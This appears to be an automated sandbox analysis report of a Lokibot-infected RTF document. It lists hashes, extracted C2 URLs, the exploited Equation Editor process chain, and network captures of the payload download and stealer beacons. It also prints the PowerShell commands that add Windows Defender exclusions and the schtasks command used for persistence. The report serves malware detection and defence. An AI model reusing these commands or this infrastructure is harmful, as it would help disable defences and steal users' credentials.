Analysis

  • max time kernel: 136s
  • max time network: 136s
  • platform: windows7_x64
  • resource: win7-20240611-en
  • resource tags: arch:x64, arch:x86, image:win7-20240611-en, locale:en-us, os:windows7-x64, system
  • submitted: 12-06-2024 06:25

General

  • Target: Scan 94K USD.rtf
  • Size: 360KB
  • MD5: 39990481e7a4ebc5ee5b30b8f9ecb44b
  • SHA1: 48d884a85d9ef84e8726a8c825f0722878ab75d1
  • SHA256: ac4e5f6f39aebb0f686813bd7ef6b678050d0876f05bd6f30aaf7d08f2d0d7d7
  • SHA512: 1c231dd4947d81b64e7e4dd526addc7d568b7e1b5049b41138073a38585c1a2cc0c54e88d4c5c40483bd29261169299e8552f3651c3e43fda98fafef0410f10c
  • SSDEEP: 6144:FwAYwAYwAYwAYwAYwAYwAYwAYwAYwAPIwL:uv

Malware Config

Extracted

  • Family: lokibot
  • C2:
    http://alphabetllc.top/alpha/five/fre.php
    http://kbfvzoboss.bid/alien/fre.php
    http://alphastand.trade/alien/fre.php
    http://alphastand.win/alien/fre.php
    http://alphastand.top/alien/fre.php

Signatures

  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Office loads VBA resources, possible macro or embedded object present
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Scan 94K USD.rtf"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2832
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1844
    • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      1⤵
      • Blocklisted process makes network request
      • Loads dropped DLL
      • Launches Equation Editor
      • Suspicious use of WriteProcessMemory
      PID:2680
      • C:\Users\Admin\AppData\Roaming\alpha34567.scr
        "C:\Users\Admin\AppData\Roaming\alpha34567.scr"
        2⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2512
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\alpha34567.scr"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2736
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\eZAoJt.exe"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:536
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eZAoJt" /XML "C:\Users\Admin\AppData\Local\Temp\tmp5B0B.tmp"
          3⤵
          • Creates scheduled task(s)
          PID:788
        • C:\Users\Admin\AppData\Roaming\alpha34567.scr
          "C:\Users\Admin\AppData\Roaming\alpha34567.scr"
          3⤵
          • Executes dropped EXE
          PID:1256
        • C:\Users\Admin\AppData\Roaming\alpha34567.scr
          "C:\Users\Admin\AppData\Roaming\alpha34567.scr"
          3⤵
          • Executes dropped EXE
          • Accesses Microsoft Outlook profiles
          • Suspicious use of AdjustPrivilegeToken
          • outlook_office_path
          • outlook_win_path
          PID:2024

    Network

    • DNS: dukeenergyltd.top (EQNEDT32.EXE), remote address 8.8.8.8:53
      Request: dukeenergyltd.top IN A
      Response: dukeenergyltd.top IN A 172.67.134.136
                dukeenergyltd.top IN A 104.21.25.202
    • GET https://dukeenergyltd.top/alphaz.scr (EQNEDT32.EXE), remote address 172.67.134.136:443
      Request
      GET /alphaz.scr HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
      Host: dukeenergyltd.top
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Date: Wed, 12 Jun 2024 06:25:10 GMT
      Content-Type: application/x-silverlight
      Content-Length: 620552
      Connection: keep-alive
      Last-Modified: Wed, 12 Jun 2024 03:12:55 GMT
      ETag: "97808-61aa8c234e012"
      Accept-Ranges: bytes
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=apqeuMfTkQBfWVDGIv22XU7wzbPSZm9Wn1h7CWmHLtRPOO9r174KXuu9xh6stcMda4ULbcmZGQitWJUErjx5kqjQBHmmrTI5%2FumQ15HC3dTsEaHgBmY3TkNVxFXOo7EZ4kXcQA%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Strict-Transport-Security: max-age=0; includeSubDomains; preload
      X-Content-Type-Options: nosniff
      Server: cloudflare
      CF-RAY: 8927c3142be09483-LHR
      alt-svc: h3=":443"; ma=86400
    • DNS: alphabetllc.top (alpha34567.scr), remote address 8.8.8.8:53
      Request: alphabetllc.top IN A
      Response: alphabetllc.top IN A 104.21.79.102
                alphabetllc.top IN A 172.67.169.238
    • POST http://alphabetllc.top/alpha/five/fre.php (alpha34567.scr), remote address 104.21.79.102:80
      Request
      POST /alpha/five/fre.php HTTP/1.0
      User-Agent: Mozilla/4.08 (Charon; Inferno)
      Host: alphabetllc.top
      Accept: */*
      Content-Type: application/octet-stream
      Content-Encoding: binary
      Content-Key: 5C35B926
      Content-Length: 374
      Connection: close
      Response
      HTTP/1.1 404 Not Found
      Date: Wed, 12 Jun 2024 06:25:23 GMT
      Content-Type: text/html; charset=UTF-8
      Connection: close
      X-Powered-By: PHP/5.4.16
      Status: 404 Not Found
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5uBvEKMCQPcnPIhRSLj5IiHeXQkWq7xuHhOwUDNVm9le5oLudS8AGTegRQ11MBgdcQdNJIVjHRb%2FFZgchxzVhQB95Yo8mScKbSjLi%2BvnGQPMBIyEzt9Y4b7%2BetfJ83fWd88%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8927c366187d6400-LHR
      alt-svc: h3=":443"; ma=86400
    • POST http://alphabetllc.top/alpha/five/fre.php (alpha34567.scr), remote address 104.21.79.102:80
      Request
      POST /alpha/five/fre.php HTTP/1.0
      User-Agent: Mozilla/4.08 (Charon; Inferno)
      Host: alphabetllc.top
      Accept: */*
      Content-Type: application/octet-stream
      Content-Encoding: binary
      Content-Key: 5C35B926
      Content-Length: 180
      Connection: close
      Response
      HTTP/1.1 404 Not Found
      Date: Wed, 12 Jun 2024 06:25:23 GMT
      Content-Type: text/html; charset=UTF-8
      Connection: close
      X-Powered-By: PHP/5.4.16
      Status: 404 Not Found
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3%2BS%2FYJiU%2B5nhkTzgUf6hpG2B6ZguwpFN5FQPPwAbRY59PHd9vflmDdGKBeUDGeJ9J9liRhIDfCO0jTf6Zbf3VKMVpiCV4DGt0UtsRnT30lju97LkG3W0em1ZPiSCUf4zqhU%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8927c3682def6439-LHR
      alt-svc: h3=":443"; ma=86400
    • POST http://alphabetllc.top/alpha/five/fre.php (alpha34567.scr), remote address 104.21.79.102:80
      Request
      POST /alpha/five/fre.php HTTP/1.0
      User-Agent: Mozilla/4.08 (Charon; Inferno)
      Host: alphabetllc.top
      Accept: */*
      Content-Type: application/octet-stream
      Content-Encoding: binary
      Content-Key: 5C35B926
      Content-Length: 153
      Connection: close
      Response
      HTTP/1.1 404 Not Found
      Date: Wed, 12 Jun 2024 06:25:23 GMT
      Content-Type: text/html; charset=UTF-8
      Connection: close
      X-Powered-By: PHP/5.4.16
      Status: 404 Not Found
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FJKE07vY%2BVsz8iv2vs5P8U02Ck8DVB2jensQfJ5l6TOSArgO2TiH1e6niBXiAzbStHYmjzllBq%2B51BEFzfVZ%2FPXXZvXy4I5BebRR2OmciKwtUhM1UncGoMOxtr6fAKTrUa0%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8927c369ed0871c2-LHR
      alt-svc: h3=":443"; ma=86400
    • POST http://alphabetllc.top/alpha/five/fre.php (alpha34567.scr), remote address 104.21.79.102:80
      Request
      POST /alpha/five/fre.php HTTP/1.0
      User-Agent: Mozilla/4.08 (Charon; Inferno)
      Host: alphabetllc.top
      Accept: */*
      Content-Type: application/octet-stream
      Content-Encoding: binary
      Content-Key: 5C35B926
      Content-Length: 153
      Connection: close
      Response
      HTTP/1.1 404 Not Found
      Date: Wed, 12 Jun 2024 06:26:23 GMT
      Content-Type: text/html; charset=UTF-8
      Connection: close
      X-Powered-By: PHP/5.4.16
      Status: 404 Not Found
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Isa6hQVIqGEzViYd4tfeoHaTh1dh88ms1oiq%2F4YNYe6hYI5UnO5VaMBqUXuFfTXWA%2FXITOv%2Fw7HINPeuZi5sSmU7dgyQyNNzPndFB00LGrKYrA5iO641luWV5gxUuLVGub4%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8927c4e2afdd635f-LHR
      alt-svc: h3=":443"; ma=86400
    • POST http://alphabetllc.top/alpha/five/fre.php (alpha34567.scr), remote address 104.21.79.102:80
      Request
      POST /alpha/five/fre.php HTTP/1.0
      User-Agent: Mozilla/4.08 (Charon; Inferno)
      Host: alphabetllc.top
      Accept: */*
      Content-Type: application/octet-stream
      Content-Encoding: binary
      Content-Key: 5C35B926
      Content-Length: 153
      Connection: close
      Response
      HTTP/1.1 404 Not Found
      Date: Wed, 12 Jun 2024 06:27:24 GMT
      Content-Type: text/html; charset=UTF-8
      Connection: close
      X-Powered-By: PHP/5.4.16
      Status: 404 Not Found
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j6jdAUxE%2BQj670m2xzzkgG3WHlLH%2FSuw9aBJmpk%2BCMR2hS%2BclqLPV8LUCszEPsE3GP54M2IwwWhTrltvvy3JsPEtQH8HfVYIoHfdSBJE3ln7TbUD4JgNVDwimHL0DnfqD60%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8927c65b6b9f93ed-LHR
      alt-svc: h3=":443"; ma=86400
    • 172.67.134.136:443  https://dukeenergyltd.top/alphaz.scr  tls, http  EQNEDT32.EXE  12.5kB  652.3kB  256  495
      HTTP Request: GET https://dukeenergyltd.top/alphaz.scr
      HTTP Response: 200
    • 104.21.79.102:80  http://alphabetllc.top/alpha/five/fre.php  http  alpha34567.scr  890 B  869 B  6  6
      HTTP Request: POST http://alphabetllc.top/alpha/five/fre.php
      HTTP Response: 404
    • 104.21.79.102:80  http://alphabetllc.top/alpha/five/fre.php  http  alpha34567.scr  696 B  869 B  6  6
      HTTP Request: POST http://alphabetllc.top/alpha/five/fre.php
      HTTP Response: 404
    • 104.21.79.102:80  http://alphabetllc.top/alpha/five/fre.php  http  alpha34567.scr  669 B  879 B  6  6
      HTTP Request: POST http://alphabetllc.top/alpha/five/fre.php
      HTTP Response: 404
    • 104.21.79.102:80  http://alphabetllc.top/alpha/five/fre.php  http  alpha34567.scr  669 B  877 B  6  6
      HTTP Request: POST http://alphabetllc.top/alpha/five/fre.php
      HTTP Response: 404
    • 104.21.79.102:80  http://alphabetllc.top/alpha/five/fre.php  http  alpha34567.scr  623 B  879 B  5  6
      HTTP Request: POST http://alphabetllc.top/alpha/five/fre.php
      HTTP Response: 404
    • 8.8.8.8:53  dukeenergyltd.top  dns  EQNEDT32.EXE  63 B  95 B  1  1
      DNS Request: dukeenergyltd.top
      DNS Response: 172.67.134.136, 104.21.25.202
    • 8.8.8.8:53  alphabetllc.top  dns  alpha34567.scr  61 B  93 B  1  1
      DNS Request: alphabetllc.top
      DNS Response: 104.21.79.102, 172.67.169.238

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\tmp5B0B.tmp
      Filesize: 1KB
      MD5: a52309e841064384aa48fdf9392e78d0
      SHA1: 4352f8a817268f71e1fb97b10fb6460c7521e891
      SHA256: 848edbd46b7080201440e8637689f5e4495f5384056373400f79847265de4b27
      SHA512: 8679b4bd342aa9a1e774ab8430f563db218a438b812ff0cc08d8c0623669183d3d4f606b46b605aa75b39063208cf3366837eb48acfcea7966c2262ce84838a2

    • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1340930862-1405011213-2821322012-1000\0f5007522459c86e95ffcc62f32308f1_527e8b4f-d968-48c7-a5cc-e9c96c60868c
      Filesize: 46B
      MD5: d898504a722bff1524134c6ab6a5eaa5
      SHA1: e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
      SHA256: 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
      SHA512: 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

    • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1340930862-1405011213-2821322012-1000\0f5007522459c86e95ffcc62f32308f1_527e8b4f-d968-48c7-a5cc-e9c96c60868c
      Filesize: 46B
      MD5: c07225d4e7d01d31042965f048728a0a
      SHA1: 69d70b340fd9f44c89adb9a2278df84faa9906b7
      SHA256: 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
      SHA512: 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
      Filesize: 20KB
      MD5: 2bfcc6bc24911dc8d87edd270c14a5f0
      SHA1: 6144ac2c4a3b09410010b5247ac14e338af3d528
      SHA256: 6f8fffb058286b8a51f66fde5efb26b4557f8da0225ed941fbfa2d8fabbdf7f4
      SHA512: 84819f136360963369521a0473b92fb22d8efe16a8ef41645c607e9ed00d93e192ebfb08898be7b8fbfa88e0ec8961def5d66222db2be93c67380f3e39fdafca

    • \Users\Admin\AppData\Roaming\alpha34567.scr
      Filesize: 606KB
      MD5: 7f84fcf457a46b922d6a1b4c8773dc9d
      SHA1: cd08dc3047946777419a7ea00d82764061cf84ab
      SHA256: 52bcfea0c53b74e2b84b54d5b9c5d4b3f214017063e3b3339bf95c84ab62f485
      SHA512: 584777150643035a12e71e535d8479b7df87d4c8d31423bee97d517b6b770814ede6135e44fbb984bbe31dbcfd8e5b8b90592b5050c35c07e470bfbfd199db5e

    • memory/2024-65-0x0000000000400000-0x00000000004A2000-memory.dmp (Filesize: 648KB)
    • memory/2024-60-0x0000000000400000-0x00000000004A2000-memory.dmp (Filesize: 648KB)
    • memory/2024-96-0x0000000000400000-0x00000000004A2000-memory.dmp (Filesize: 648KB)
    • memory/2024-86-0x0000000000400000-0x00000000004A2000-memory.dmp (Filesize: 648KB)
    • memory/2024-54-0x0000000000400000-0x00000000004A2000-memory.dmp (Filesize: 648KB)
    • memory/2024-62-0x0000000000400000-0x00000000004A2000-memory.dmp (Filesize: 648KB)
    • memory/2024-67-0x0000000000400000-0x00000000004A2000-memory.dmp (Filesize: 648KB)
    • memory/2024-56-0x0000000000400000-0x00000000004A2000-memory.dmp (Filesize: 648KB)
    • memory/2024-64-0x000000007EFDE000-0x000000007EFDF000-memory.dmp (Filesize: 4KB)
    • memory/2024-58-0x0000000000400000-0x00000000004A2000-memory.dmp (Filesize: 648KB)
    • memory/2512-39-0x0000000000A10000-0x0000000000A2A000-memory.dmp (Filesize: 104KB)
    • memory/2512-34-0x0000000000A60000-0x0000000000AF8000-memory.dmp (Filesize: 608KB)
    • memory/2512-33-0x000000006B7EE000-0x000000006B7EF000-memory.dmp (Filesize: 4KB)
    • memory/2512-42-0x0000000004BF0000-0x0000000004C52000-memory.dmp (Filesize: 392KB)
    • memory/2512-41-0x00000000004C0000-0x00000000004D0000-memory.dmp (Filesize: 64KB)
    • memory/2832-0-0x000000002FF01000-0x000000002FF02000-memory.dmp (Filesize: 4KB)
    • memory/2832-2-0x000000007166D000-0x0000000071678000-memory.dmp (Filesize: 44KB)
    • memory/2832-88-0x000000007166D000-0x0000000071678000-memory.dmp (Filesize: 44KB)
    • memory/2832-1-0x000000005FFF0000-0x0000000060000000-memory.dmp (Filesize: 64KB)
    • memory/2832-118-0x000000005FFF0000-0x0000000060000000-memory.dmp (Filesize: 64KB)
